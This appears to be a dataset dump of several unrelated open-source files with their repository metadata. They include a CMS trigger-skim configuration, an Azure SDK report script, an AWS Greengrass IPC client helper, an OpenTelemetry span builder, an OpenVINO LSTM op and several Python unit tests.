"HLT_DoublePhoton5_eeRes_L1R", #added to match the /cdaq/physics/firstCollisions10/v2.0/HLT_7TeV/V5 table
"HLT_DoublePhoton5_Jpsi_L1R",
"HLT_DoublePhoton5_Upsilon_L1R",
"HLT_DoublePhoton5_L1R",
"HLT_DoublePhoton10_L1R",
"HLT_DoubleEle5_SW_L1R",
"HLT_Ele20_LW_L1R",
"HLT_Ele15_SiStrip_L1R",
"HLT_Ele15_SC10_LW_L1R",
"HLT_Ele15_LW_L1R",
"HLT_Ele10_LW_EleId_L1R",
"HLT_Ele10_LW_L1R",
"HLT_Photon15_TrackIso_L1R"
)
process.EG_1e28.HLTPathsPrescales = cms.vuint32(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)
process.EG_1e28.HLTOverallPrescale = cms.uint32(1)
process.EG_1e28.throw = False
process.EG_1e28.andOr = True
process.filterSdEG_1e28 = cms.Path(process.EG_1e28)
### JetMET AOD CS
process.DiJetAve_1e29 = HLTrigger.HLTfilters.hltHighLevelDev_cfi.hltHighLevelDev.clone(andOr = True)
process.DiJetAve_1e29.HLTPaths = ("HLT_DiJetAve15U_8E29","HLT_DiJetAve30U_8E29")
process.DiJetAve_1e29.HLTPathsPrescales = cms.vuint32(1,1)
process.DiJetAve_1e29.HLTOverallPrescale = cms.uint32(1)
process.DiJetAve_1e29.andOr = True
process.filterCsDiJetAve_1e29 = cms.Path(process.DiJetAve_1e29)
### Onia skim CS
process.goodMuons = cms.EDFilter("MuonRefSelector",
src = cms.InputTag("muons"),
cut = cms.string("isGlobalMuon || (isTrackerMuon && numberOfMatches('SegmentAndTrackArbitration')>0)"),
)
process.diMuons = cms.EDProducer("CandViewShallowCloneCombiner",
decay = cms.string("goodMuons goodMuons"),
checkCharge = cms.bool(False),
cut = cms.string("mass > 2"),
)
process.diMuonFilter = cms.EDFilter("CandViewCountFilter",
src = cms.InputTag("diMuons"),
minNumber = cms.uint32(1),
)
process.Skim_diMuons = cms.Path(
process.goodMuons *
process.diMuons *
process.diMuonFilter
)
### Tau skim CS
process.load("CondCore.DBCommon.CondDBSetup_cfi")
process.load("TrackingTools/TransientTrack/TransientTrackBuilder_cfi")
process.load("L1TriggerConfig.L1GtConfigProducers.L1GtTriggerMaskTechTrigConfig_cff")
process.load("HLTrigger/HLTfilters/hltLevel1GTSeed_cfi")
process.hltLevel1GTSeed.L1TechTriggerSeeding = cms.bool(True)
process.hltLevel1GTSeed.L1SeedsLogicalExpression = cms.string('(0 AND (40 OR 41) AND NOT (36 OR 37 OR 38 OR 39))')
process.scrapping = cms.EDFilter("FilterOutScraping",
applyfilter = cms.untracked.bool(True),
debugOn = cms.untracked.bool(False),
numtrack = cms.untracked.uint32(10),
thresh = cms.untracked.double(0.25)
)
process.PFTausSelected = cms.EDFilter("PFTauSelector",
src = cms.InputTag("shrinkingConePFTauProducer"),
discriminators = cms.VPSet(
cms.PSet( discriminator=cms.InputTag("shrinkingConePFTauDiscriminationByIsolation"),
selectionCut=cms.double(0.5)
),
),
cut = cms.string('et > 15. && abs(eta) < 2.5')
)
process.PFTauSkimmed = cms.EDFilter("CandViewCountFilter",
src = cms.InputTag('PFTausSelected'),
minNumber = cms.uint32(1)
)
process.tauFilter = cms.Path(
process.hltLevel1GTSeed *
process.scrapping *
process.PFTausSelected *
process.PFTauSkimmed
)
process.outputSdJetMETTau = cms.OutputModule("PoolOutputModule",
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('filterSdJetMETTau_1e28')),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RECO'),
filterName = cms.untracked.string('SD_JetMETTau')),
outputCommands = process.RECOEventContent.outputCommands,
fileName = cms.untracked.string('SD_JetMETTau_1e28.root')
)
process.outputSdJetMETTauMonitor = cms.OutputModule("PoolOutputModule",
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('filterSdJetMETTauMonitor_1e28')),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RECO'),
filterName = cms.untracked.string('SD_JetMETTauMonitor')),
outputCommands = process.RECOEventContent.outputCommands,
fileName = cms.untracked.string('SD_JetMETTauMonitor_1e28.root')
)
process.outputSdMuMonitor = cms.OutputModule("PoolOutputModule",
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('filterSdMuMonitor_1e28')),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RECO'),
filterName = cms.untracked.string('SD_MuMonitor')),
outputCommands = process.RECOEventContent.outputCommands,
fileName = cms.untracked.string('SD_MuMonitor_1e28.root')
)
process.outputSdMu = cms.OutputModule("PoolOutputModule",
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('filterSdMu_1e28')),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RECO'),
filterName = cms.untracked.string('SD_Mu')),
outputCommands = process.RECOEventContent.outputCommands,
fileName = cms.untracked.string('SD_Mu_1e28.root')
)
process.outputSdEGMonitor = cms.OutputModule("PoolOutputModule",
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('filterSdEGMonitor_1e28')),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RECO'),
filterName = cms.untracked.string('SD_EGMonitor')),
outputCommands = process.RECOEventContent.outputCommands,
fileName = cms.untracked.string('SD_EGMonitor_1e28.root')
)
process.outputSdEG = cms.OutputModule("PoolOutputModule",
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('filterSdEG_1e28')),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RECO'),
filterName = cms.untracked.string('SD_EG')),
outputCommands = process.RECOEventContent.outputCommands,
fileName = cms.untracked.string('SD_EG_1e28.root')
)
process.outputCsDiJet = cms.OutputModule("PoolOutputModule",
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('USER'),
filterName = cms.untracked.string('CS_DiJetAve')),
outputCommands = cms.untracked.vstring(
'drop *',
#------- CaloJet collections ------
'keep recoCaloJets_kt4CaloJets_*_*',
'keep recoCaloJets_kt6CaloJets_*_*',
'keep recoCaloJets_ak5CaloJets_*_*',
'keep recoCaloJets_ak7CaloJets_*_*',
'keep recoCaloJets_iterativeCone5CaloJets_*_*',
#------- CaloJet ID ---------------
'keep *_kt4JetID_*_*',
'keep *_kt6JetID_*_*',
'keep *_ak5JetID_*_*',
'keep *_ak7JetID_*_*',
'keep *_ic5JetID_*_*',
#------- PFJet collections ------
'keep recoPFJets_kt4PFJets_*_*',
'keep recoPFJets_kt6PFJets_*_*',
'keep recoPFJets_ak5PFJets_*_*',
'keep recoPFJets_ak7PFJets_*_*',
'keep recoPFJets_iterativeCone5PFJets_*_*',
#------- JPTJet collections ------
'keep *_JetPlusTrackZSPCorJetAntiKt5_*_*',
#'keep *_ak4JPTJets_*_*',
#'keep *_iterativeCone5JPTJets_*_*',
#------- Trigger collections ------
'keep edmTriggerResults_TriggerResults_*_*',
'keep *_hltTriggerSummaryAOD_*_*',
'keep L1GlobalTriggerObjectMapRecord_*_*_*',
'keep L1GlobalTriggerReadoutRecord_*_*_*',
#------- Tracks collection --------
'keep recoTracks_generalTracks_*_*',
#------- CaloTower collection -----
'keep *_towerMaker_*_*',
#------- Various collections ------
'keep *_EventAuxilary_*_*',
'keep *_offlinePrimaryVertices_*_*',
'keep *_hcalnoise_*_*',
#------- MET collections ----------
'keep *_metHO_*_*',
'keep *_metNoHF_*_*',
'keep *_metNoHFHO_*_*',
'keep *_met_*_*'),
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('filterCsDiJetAve_1e29')),
fileName = cms.untracked.string('CS_JetAOD_DiJetAve_1e28.root')
)
process.outputCsOnia = cms.OutputModule("PoolOutputModule",
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RECO'),
filterName = cms.untracked.string('CS_Onia')),
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('Skim_diMuons')),
outputCommands = process.RECOEventContent.outputCommands,
fileName = cms.untracked.string('CS_Onia_1e28.root')
)
process.outputCsTau = cms.OutputModule("PoolOutputModule",
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RAW-RECO'),
filterName = cms.untracked.string('CS_Tau')),
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('tauFilter')),
outputCommands = process.FEVTEventContent.outputCommands,
fileName = cms.untracked.string('CS_Tau_1e28.root')
)
process.this_is_the_end = cms.EndPath(
process.outputSdJetMETTau +
process.outputSdJetMETTauMonitor +
process.outputSdMuMonitor +
process.outputSdMu +
process.outputSdEGMonitor +
process.outputSdEG +
process.outputCsDiJet +
process.outputCsOnia +
process.outputCsTau
)
|
003a40926894575eabe1398b53e939f845cc566e
|
8c4af05e0257661195c95b0b9e0873eeb6391dab
|
/eng/scripts/python_sdk_report.py
|
af4dc3502023f094a7d01a6d7a0ff3b52d0c8ebc
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
Azure/azure-sdk-tools
|
6d171054800807fcbe7b8b878c5903a202d31faa
|
2dce521dedc3f5169007d4c481ae8ec077be4450
|
refs/heads/main
| 2023-09-01T00:00:32.662190
| 2023-08-31T22:21:44
| 2023-08-31T22:21:44
| 170,592,186
| 113
| 174
|
MIT
| 2023-09-14T21:53:41
| 2019-02-13T22:55:46
|
C#
|
UTF-8
|
Python
| false
| false
| 2,472
|
py
|
python_sdk_report.py
|
#!/usr/bin/python3
"""
python_sdk_report.py
Generate APIView for all SDKs in the azure-sdk-for-python repo and report on any failures.
"""
import glob
import json
import os
import re
import sys
from typing import Optional
from apistub import StubGenerator
ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..'))
PACKAGE_NAME_RE = re.compile(r"sdk\\([a-z]+)\\([a-z\-]+)\\setup.py")
SKIP_PACKAGES = [
"core:azure",
"core:azure-mgmt",
"monitor:azure-monitor",
"storage:azure-storage"
]
class _Result:
def __init__(self, *, service_dir: str, package_name: str, success: bool, error: Optional[str]):
self.service_dir = service_dir
self.package_name = package_name
self.success = success
self.error = error
if __name__ == '__main__':
warning_color = '\033[91m'
end_color = '\033[0m'
stub_gen_path = os.path.join(ROOT, 'packages', 'python-packages', 'apiview-stub-generator')
changelog_path = os.path.join(stub_gen_path, "CHANGELOG.md")
version_path = os.path.join(stub_gen_path, 'apistub', '_version.py')
args = sys.argv
if len(args) != 2:
print("usage: python python_sdk_report.py <PYTHON SDK REPO ROOT>")
sys.exit(1)
python_sdk_root = args[1]
print(f"Python SDK Root: {python_sdk_root}")
results = {}
for path in glob.glob(os.path.join(python_sdk_root, "sdk", "**", "**", "setup.py")):
package_path = os.path.split(path)[0]
try:
(service_dir, package_name) = PACKAGE_NAME_RE.findall(path)[0]
except:
print(f"Couldn't parse: {path}")
continue
if f"{service_dir}:{package_name}" in SKIP_PACKAGES:
continue
print(f"Parsing {service_dir}/{package_name}...")
if service_dir not in results:
results[service_dir] = []
try:
_ = StubGenerator(pkg_path=package_path, skip_pylint=True).generate_tokens()
success = True
error = None
except Exception as err:
success = False
error = str(err)
results[service_dir].append(_Result(
service_dir=service_dir,
package_name=package_name,
success=success,
error=error
))
filename = "stubgen_report.json"
print(f"Saving results to {filename}...")
with open(filename, "w") as outfile:
outfile.write(json.dumps(results, indent=4))
|
b7f1a30ef657571a8bb86310583c07843165aca3
|
c9614a0155feaf23f7149e6f469ac0dc5694edec
|
/code/recursion.py
|
fbda706b7d7a7043a152070569aeb62ef806d740
|
[
"MIT"
] |
permissive
|
BYRIO/BUPTBachelorThesis
|
28e798d6b2fbdf77c893459f5879ad782ade883f
|
4cc82737009db5cec15230e41b4774e9a786baee
|
refs/heads/master
| 2023-06-23T23:24:41.906595
| 2023-06-01T02:48:46
| 2023-06-01T02:48:46
| 134,641,972
| 136
| 47
|
MIT
| 2023-06-15T02:42:20
| 2018-05-24T00:56:52
|
TeX
|
UTF-8
|
Python
| false
| false
| 68
|
py
|
recursion.py
|
def numbers(x):
if x > 0:
print(x)
numbers(x-1)
|
0fbab27c094914a96fcf3f49e901aa1bd34347c4
|
8d6ca1631ef5dd98c65147b01a4b186af055813f
|
/awsiot/greengrasscoreipc/__init__.py
|
c60e68f840d64c7c523eee556873ba61504b809a
|
[
"Apache-2.0"
] |
permissive
|
aws/aws-iot-device-sdk-python-v2
|
fc888c3c08ccca9b7871ceb60ecb51c87d1bcc34
|
30d6fb27c9ba5b553d25fda5911d16279960f175
|
refs/heads/main
| 2023-09-04T10:57:42.561856
| 2023-08-28T21:09:34
| 2023-08-28T21:09:34
| 157,452,080
| 346
| 224
|
Apache-2.0
| 2023-09-13T18:25:20
| 2018-11-13T21:52:37
|
Python
|
UTF-8
|
Python
| false
| false
| 2,337
|
py
|
__init__.py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0.
import os
from typing import Optional
from awscrt.io import (
ClientBootstrap,
DefaultHostResolver,
EventLoopGroup,
SocketDomain,
SocketOptions,
)
from awsiot.eventstreamrpc import (
Connection,
LifecycleHandler,
MessageAmendment,
)
from awsiot.greengrasscoreipc.client import GreengrassCoreIPCClient
def connect(*,
ipc_socket: str=None,
authtoken: str=None,
lifecycle_handler: Optional[LifecycleHandler]=None,
timeout: float=10.0) -> GreengrassCoreIPCClient:
"""
Creates an IPC client and connects to the GreengrassCoreIPC service.
Args:
ipc_socket: Path to the Unix domain socket of Greengrass Nucleus, defaults to
environment variable AWS_GG_NUCLEUS_DOMAIN_SOCKET_FILEPATH_FOR_COMPONENT
authtoken: Authentication token, defaults to environment variable SVCUID
lifecycle_handler: Handler for events over the course of this
network connection. See :class:`awsiot.eventstreamrpc.LifecycleHandler` for more info.
Handler methods will only be invoked if the connect attempt
succeeds.
timeout: The number of seconds to wait for establishing the connection.
Returns:
Client for the GreengrassCoreIPC service.
"""
if not ipc_socket:
ipc_socket = os.environ["AWS_GG_NUCLEUS_DOMAIN_SOCKET_FILEPATH_FOR_COMPONENT"]
if not authtoken:
authtoken = os.environ["SVCUID"]
if not lifecycle_handler:
lifecycle_handler = LifecycleHandler()
elg = EventLoopGroup(num_threads=1)
resolver = DefaultHostResolver(elg)
bootstrap = ClientBootstrap(elg, resolver)
socket_options = SocketOptions()
socket_options.domain = SocketDomain.Local
amender = MessageAmendment.create_static_authtoken_amender(authtoken)
connection = Connection(
host_name=ipc_socket,
port=0, # dummy port number, not needed for Unix domain sockets
bootstrap=bootstrap,
socket_options=socket_options,
connect_message_amender=amender,
)
connect_future = connection.connect(lifecycle_handler)
connect_future.result(timeout)
return GreengrassCoreIPCClient(connection)
|
aa14dfdb94b09de291c40c50f5f6b27b55647043
|
cfdd6d24f7139d057d13afe32f1dc1de64b33c3f
|
/test/test_indices.py
|
e607fcbb6425bd428fffadb8f5e6ebcf31f08e80
|
[
"MIT"
] |
permissive
|
timduly4/pyglow
|
cec15d7afe7f90dc5f2f019626f63622da4c3de0
|
1988757f3b6a4bd5ed98266a3fb1dc64f2513fc5
|
refs/heads/master
| 2023-05-10T19:02:52.777677
| 2023-05-02T19:07:51
| 2023-05-02T19:07:51
| 12,006,247
| 105
| 60
|
MIT
| 2023-05-02T19:09:55
| 2013-08-09T17:06:55
|
Fortran
|
UTF-8
|
Python
| false
| false
| 814
|
py
|
test_indices.py
|
from datetime import datetime
import math
import unittest
from src.pyglow import Indice
from src.pyglow.constants import DIR_FILE as pyglow_file
print("pyglow file: {}".format(pyglow_file))
class TestIndice(unittest.TestCase):
def setUp(self):
# Instantiate indice data structure:
dn = datetime(2010, 3, 23, 15, 30)
self.indice = Indice(dn)
def tearDown(self):
pass
def test_run(self):
""" Retrieval of geophysical indices """
self.indice.run()
self.assertFalse(math.isnan(self.indice.f107))
def test_all_nan(self):
# Nominal case:
self.indice.run()
self.assertFalse(self.indice.all_nan())
def test_all_nan_not_run(self):
# Not running indices:
self.assertTrue(self.indice.all_nan())
|
ec097e2d95db1f832ac3ec20245c1960482f6915
|
2ae0b8d95d439ccfd55ea7933ad4a2994ad0f6c5
|
/tools/mo/openvino/tools/mo/ops/lstm_sequence.py
|
56401ec05bd648d21fbb35aff27f46be97c8c092
|
[
"Apache-2.0"
] |
permissive
|
openvinotoolkit/openvino
|
38ea745a247887a4e14580dbc9fc68005e2149f9
|
e4bed7a31c9f00d8afbfcabee3f64f55496ae56a
|
refs/heads/master
| 2023-08-18T03:47:44.572979
| 2023-08-17T21:24:59
| 2023-08-17T21:24:59
| 153,097,643
| 3,953
| 1,492
|
Apache-2.0
| 2023-09-14T21:42:24
| 2018-10-15T10:54:40
|
C++
|
UTF-8
|
Python
| false
| false
| 6,465
|
py
|
lstm_sequence.py
|
# Copyright (C) 2018-2023 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import numpy as np
from openvino.tools.mo.front.common.partial_infer.utils import mark_input_bins, shape_array, shape_insert
from openvino.tools.mo.front.common.partial_infer.utils import int64_array
from openvino.tools.mo.graph.graph import Node, add_opoutput, Graph
from openvino.tools.mo.ops.op import Op
class LSTMSequence(Op):
""" Implements a layer that incorporates LSTM cell in a loop like it is specified in ONNX
It is assumed that there is no equivalent of this op in IE,
so it is considered as intermediate operation that will be translated differently.
We define type for this operation to enable debuggin at IE side.
There are several flavors of this op depending on how it was created and in which framework.
There are several attributes that specifies the LSTM flavor:
- ONNX/LSTM gives this op in non-normalized form and will require normalization
as a separate transformation (see LSTMSequenceNormalize middle transformation);
in this case blobs_wrb=True. Normalized weights/biases for MatMul is used when
blobs_wrb=True.
- ONNX/LSTM defines output shape as 4D: [seq_length, num_directions, batch_size,
hidden_size], where num_directions = 1 is supported only. In this case
has_num_directions=True. Otherwise, output is 3D and doesn't contain num_directions.
- Depending on the original framework, `format` attrtibutes is specified accordingly.
Its value controls which normalize transformations are called.
"""
op = 'LSTMSequence'
def __init__(self, graph: Graph, attrs: dict):
mandatory_props = {
'type': None, # should be never emitted to IR; for debugging purposes
'op': self.op,
'blobs_wrb': False,
'has_num_directions': False,
'direction': 'forward',
'num_layers': 1,
'infer': self.infer,
'blob_bidirectional_split': lambda node: (
LSTMSequence.split_helper(node, 0, 'forward'),
LSTMSequence.split_helper(node, 1, 'reverse')
)
}
super().__init__(graph, mandatory_props, attrs)
def supported_attrs(self):
return [
'hidden_size', # number of the elements in hidden cell size
'direction', # one of 'forward', 'reverse', or 'bidirectional'
'batch_dim', # batch dimension index in input/output shape
'sequence_dim', # sequence dimension index in input shape
'blobs_wrb', # input blobs have three separate components W, R and B like in ONNX/LSTM
'has_num_directions', # if True, output shape has 4 dimensions; 3D otherwise
'format', # format type of input blobs for different frameworks (onnx, tf, mxnet)
]
def backend_attrs(self):
return [
'hidden_size',
('activations', lambda node: ','.join(node['activations']) if node.has_and_set('activations') else None),
('activations_alpha', lambda node: ','.join(map(str, node['activations_alpha']))
if node.has_and_set('activations_alpha') else None),
('activations_beta', lambda node: ','.join(map(str, node['activations_beta']))
if node.has_and_set('activations_beta') else None),
'clip',
'direction',
]
@staticmethod
def split_helper(node, index: int, direction: str):
return Op._create_data_node(
node.graph,
name=node.name + '/SplittedBiLSTM/{}/'.format(direction),
attrs={'value': node.value[index], 'shape': int64_array(node.value[index].shape)}
)
@staticmethod
def infer(node: Node):
# there are limitations coming from ONNX LSTM definition and normalization rules
assert len(node.in_nodes()) >= 3 # X, W and R
assert len(node.in_nodes()) <= 7
assert len(node.out_nodes()) <= 3
assert node.batch_dim <= 1
assert node.sequence_dim <= 1
assert node.batch_dim != node.sequence_dim
assert node.direction in ['forward', 'reverse', 'bidirectional']
if node.blobs_wrb:
mark_input_bins(node, ['W', 'R', 'B'])
else:
mark_input_bins(node)
input_shape = node.in_node(0).shape
assert len(input_shape) == 3
for port in [2, 3]:
if port in node.in_nodes() and len(node.in_node(port).in_nodes()) > 0 and \
'zero_shapes' in node.in_node(port).in_node():
for i in node.in_node(port).in_node().zero_shapes:
if node.in_node(port).shape[i] != input_shape[i]:
node.in_node(port).value = np.repeat(node.in_node(port).value, input_shape[i], axis=i)
node.in_node(port).shape[i] = input_shape[i]
out_shape = shape_array([input_shape[node.sequence_dim], input_shape[node.batch_dim], node.hidden_size])
assert not node.has_num_directions or node.sequence_dim == 0, \
'If has_num_directions == True, then node.sequence_dim should be equal 0, but it is {}'.format(
node.sequence_dim)
num_directions = 2 if node.direction in ['bidirectional'] else 1
num_layers = node.num_layers
if node.has_num_directions:
# insert extra dimension to output shape for num_directions
out_shape = shape_insert(out_shape, 1, np.int64(num_directions))
node.out_node(0).shape = out_shape
# extra outputs for hidden/cell states
state_size = shape_array([input_shape[1], node.hidden_size])
if node.has_num_directions:
state_size = shape_insert(state_size, 0, num_directions * num_layers)
for i in [1,2]:
if i not in node.out_nodes():
data_node = Op._create_data_node(
node.graph,
name=node.node+'/ExtraOutput/' + str(i),
attrs={'executable': True}
)
node.graph.add_edge(node.id, data_node.id, key=0, out=i)
add_opoutput(node.graph, data_node.id, 0, False)
else:
data_node = node.out_node(i)
data_node.shape = state_size.copy()
|
14bcaa42fb9231dbb99dac4abbc886f43b7ef376
|
f80ef3a3cf859b13e8af8433af549b6b1043bf6e
|
/pyobjc-framework-Quartz/PyObjCTest/test_civector.py
|
bb5398861c5a7b1a0fd502c3c33815fe4e5d5707
|
[
"MIT"
] |
permissive
|
ronaldoussoren/pyobjc
|
29dc9ca0af838a56105a9ddd62fb38ec415f0b86
|
77b98382e52818690449111cd2e23cd469b53cf5
|
refs/heads/master
| 2023-09-01T05:15:21.814504
| 2023-06-13T20:00:17
| 2023-06-13T20:00:17
| 243,933,900
| 439
| 49
| null | 2023-06-25T02:49:07
| 2020-02-29T08:43:12
|
Python
|
UTF-8
|
Python
| false
| false
| 414
|
py
|
test_civector.py
|
from PyObjCTools.TestSupport import TestCase
import Quartz
class TestCIVector(TestCase):
def testMethods(self):
self.assertArgIsIn(Quartz.CIVector.vectorWithValues_count_, 0)
self.assertArgSizeInArg(Quartz.CIVector.vectorWithValues_count_, 0, 1)
self.assertArgIsIn(Quartz.CIVector.initWithValues_count_, 0)
self.assertArgSizeInArg(Quartz.CIVector.initWithValues_count_, 0, 1)
|
fbf864f7745bb0da4dfc3a3b88de8abdd8ead9c4
|
05643b9b4d20db912c3dbfbc191cadea3143016c
|
/instrumentation/opentelemetry-instrumentation-aio-pika/src/opentelemetry/instrumentation/aio_pika/span_builder.py
|
056f3dab25a950bf02ea4c8d9f2a6672a122d036
|
[
"Apache-2.0"
] |
permissive
|
open-telemetry/opentelemetry-python-contrib
|
35566cd088aa0b23ca977109fcd435ee480784b9
|
0871dd455c0adfa125a2f258a0b55c47a5da5227
|
refs/heads/main
| 2023-08-26T07:30:40.212226
| 2023-08-21T16:42:12
| 2023-08-21T16:42:12
| 220,524,743
| 476
| 401
|
Apache-2.0
| 2023-09-14T21:36:33
| 2019-11-08T18:23:43
|
Python
|
UTF-8
|
Python
| false
| false
| 3,206
|
py
|
span_builder.py
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Optional
from aio_pika.abc import AbstractChannel, AbstractMessage
from opentelemetry.instrumentation.aio_pika.utils import (
is_instrumentation_enabled,
)
from opentelemetry.semconv.trace import (
MessagingOperationValues,
SpanAttributes,
)
from opentelemetry.trace import Span, SpanKind, Tracer
_DEFAULT_ATTRIBUTES = {SpanAttributes.MESSAGING_SYSTEM: "rabbitmq"}
class SpanBuilder:
def __init__(self, tracer: Tracer):
self._tracer = tracer
self._attributes = _DEFAULT_ATTRIBUTES.copy()
self._operation: MessagingOperationValues = None
self._kind: SpanKind = None
self._destination: str = None
def set_as_producer(self):
self._kind = SpanKind.PRODUCER
def set_as_consumer(self):
self._kind = SpanKind.CONSUMER
def set_operation(self, operation: MessagingOperationValues):
self._operation = operation
def set_destination(self, destination: str):
self._destination = destination
self._attributes[SpanAttributes.MESSAGING_DESTINATION] = destination
def set_channel(self, channel: AbstractChannel):
connection = channel.connection
if getattr(connection, "connection", None):
# aio_rmq 7
url = connection.connection.url
else:
# aio_rmq 8
url = connection.url
self._attributes.update(
{
SpanAttributes.NET_PEER_NAME: url.host,
SpanAttributes.NET_PEER_PORT: url.port,
}
)
def set_message(self, message: AbstractMessage):
properties = message.properties
if properties.message_id:
self._attributes[
SpanAttributes.MESSAGING_MESSAGE_ID
] = properties.message_id
if properties.correlation_id:
self._attributes[
SpanAttributes.MESSAGING_CONVERSATION_ID
] = properties.correlation_id
def build(self) -> Optional[Span]:
if not is_instrumentation_enabled():
return None
if self._operation:
self._attributes[SpanAttributes.MESSAGING_OPERATION] = self._operation.value
else:
self._attributes[SpanAttributes.MESSAGING_TEMP_DESTINATION] = True
span = self._tracer.start_span(
self._generate_span_name(), kind=self._kind, attributes=self._attributes
)
return span
def _generate_span_name(self) -> str:
operation_value = self._operation.value if self._operation else "send"
return f"{self._destination} {operation_value}"
|
d852302bfef7da09c408f4b456855cd38ae1247b
|
11cd362cdd78c2fc48042ed203614b201ac94aa6
|
/desktop/core/ext-py3/eventlet-0.30.2/tests/timeout_test_with_statement.py
|
cd452a26e679bbb482715c0a5942c51f0d0e4498
|
[
"MIT",
"CC-BY-3.0",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference",
"ZPL-2.0",
"Unlicense",
"LGPL-3.0-only",
"CC0-1.0",
"LicenseRef-scancode-other-permissive",
"CNRI-Python",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-2.0-or-later",
"Python-2.0",
"GPL-3.0-only",
"CC-BY-4.0",
"LicenseRef-scancode-jpython-1.1",
"AFL-2.1",
"JSON",
"WTFPL",
"LicenseRef-scancode-generic-exception",
"LicenseRef-scancode-jython",
"GPL-3.0-or-later",
"LicenseRef-scancode-python-cwi",
"BSD-3-Clause",
"LGPL-3.0-or-later",
"Zlib",
"LicenseRef-scancode-free-unknown",
"Classpath-exception-2.0",
"LicenseRef-scancode-proprietary-license",
"GPL-1.0-or-later",
"LGPL-2.0-or-later",
"MPL-2.0",
"ISC",
"GPL-2.0-only",
"ZPL-2.1",
"BSL-1.0",
"Apache-2.0",
"LGPL-2.0-only",
"LicenseRef-scancode-public-domain",
"Xnet",
"BSD-2-Clause"
] |
permissive
|
cloudera/hue
|
b42343d0e03d2936b5a9a32f8ddb3e9c5c80c908
|
dccb9467675c67b9c3399fc76c5de6d31bfb8255
|
refs/heads/master
| 2023-08-31T06:49:25.724501
| 2023-08-28T20:45:00
| 2023-08-28T20:45:00
| 732,593
| 5,655
| 2,244
|
Apache-2.0
| 2023-09-14T03:05:41
| 2010-06-21T19:46:51
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 4,136
|
py
|
timeout_test_with_statement.py
|
"""Tests with-statement behavior of Timeout class."""
import gc
import sys
import time
import weakref
from eventlet import sleep
from eventlet.timeout import Timeout
from tests import LimitedTestCase
DELAY = 0.01
class Error(Exception):
pass
class Test(LimitedTestCase):
def test_cancellation(self):
# Nothing happens if with-block finishes before the timeout expires
t = Timeout(DELAY * 2)
sleep(0) # make it pending
assert t.pending, repr(t)
with t:
assert t.pending, repr(t)
sleep(DELAY)
# check if timer was actually cancelled
assert not t.pending, repr(t)
sleep(DELAY * 2)
def test_raising_self(self):
# An exception will be raised if it's not
try:
with Timeout(DELAY) as t:
sleep(DELAY * 2)
except Timeout as ex:
assert ex is t, (ex, t)
else:
raise AssertionError('must raise Timeout')
def test_raising_self_true(self):
# specifying True as the exception raises self as well
try:
with Timeout(DELAY, True) as t:
sleep(DELAY * 2)
except Timeout as ex:
assert ex is t, (ex, t)
else:
raise AssertionError('must raise Timeout')
def test_raising_custom_exception(self):
# You can customize the exception raised:
try:
with Timeout(DELAY, IOError("Operation takes way too long")):
sleep(DELAY * 2)
except IOError as ex:
assert str(ex) == "Operation takes way too long", repr(ex)
def test_raising_exception_class(self):
# Providing classes instead of values should be possible too:
try:
with Timeout(DELAY, ValueError):
sleep(DELAY * 2)
except ValueError:
pass
def test_raising_exc_tuple(self):
try:
1 // 0
except:
try:
with Timeout(DELAY, sys.exc_info()[0]):
sleep(DELAY * 2)
raise AssertionError('should not get there')
raise AssertionError('should not get there')
except ZeroDivisionError:
pass
else:
raise AssertionError('should not get there')
def test_cancel_timer_inside_block(self):
# It's possible to cancel the timer inside the block:
with Timeout(DELAY) as timer:
timer.cancel()
sleep(DELAY * 2)
def test_silent_block(self):
# To silence the exception before exiting the block, pass
# False as second parameter.
XDELAY = 0.1
start = time.time()
with Timeout(XDELAY, False):
sleep(XDELAY * 2)
delta = (time.time() - start)
assert delta < XDELAY * 2, delta
def test_dummy_timer(self):
# passing None as seconds disables the timer
with Timeout(None):
sleep(DELAY)
sleep(DELAY)
def test_ref(self):
err = Error()
err_ref = weakref.ref(err)
with Timeout(DELAY * 2, err):
sleep(DELAY)
del err
gc.collect()
assert not err_ref(), repr(err_ref())
def test_nested_timeout(self):
with Timeout(DELAY, False):
with Timeout(DELAY * 2, False):
sleep(DELAY * 3)
raise AssertionError('should not get there')
with Timeout(DELAY) as t1:
with Timeout(DELAY * 2) as t2:
try:
sleep(DELAY * 3)
except Timeout as ex:
assert ex is t1, (ex, t1)
assert not t1.pending, t1
assert t2.pending, t2
assert not t2.pending, t2
with Timeout(DELAY * 2) as t1:
with Timeout(DELAY) as t2:
try:
sleep(DELAY * 3)
except Timeout as ex:
assert ex is t2, (ex, t2)
assert t1.pending, t1
assert not t2.pending, t2
assert not t1.pending, t1
|
